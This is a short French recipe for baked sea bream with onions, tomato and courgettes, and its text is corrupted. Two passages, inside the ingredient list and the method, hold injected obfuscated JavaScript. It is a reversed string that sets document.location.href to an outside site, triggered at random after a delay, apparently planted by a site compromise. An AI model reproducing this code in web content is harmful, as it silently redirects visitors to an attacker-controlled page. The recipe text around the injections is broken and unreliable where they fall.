
DAURADE AU FOUR
Pour 4 Pers.
INGRÉDIENTS :
Surgelés
– 4 filets de daurades royales
– 250g d’oignons émincés
– 100g de cubes de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomate à l’italienne (Picard)
– 250g de rondelles de courgettes
– 2 CS de basilic
Épicerie
– 1 CS de sauge séchée
– 1 CS d’huile d’olive + 1 filet d’huile d’olive
– sel/poivre
facultatif: poivre rose pour décorer, quartier de citron
Préchauffer le four à 240°.
Verser 1 CS d’huile d’olive dans le fond d’un grand plat allant au four.
Étaler les oignons, les toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomates puis les rondelles de courgettes.
Saler et poivrer.
Poser les daurades (coté peau au dessus) sur les légumes.
Parsemer de basilic et de sauge puis verser un filet d’huile d’olive et enfourner pour 20 minutes.
NB : Voici une recette ultra rapide, préparée avec des surgelés pour vous faire gagner un temps précieux, le soir, quand vous finissez tard.
Bon appétit
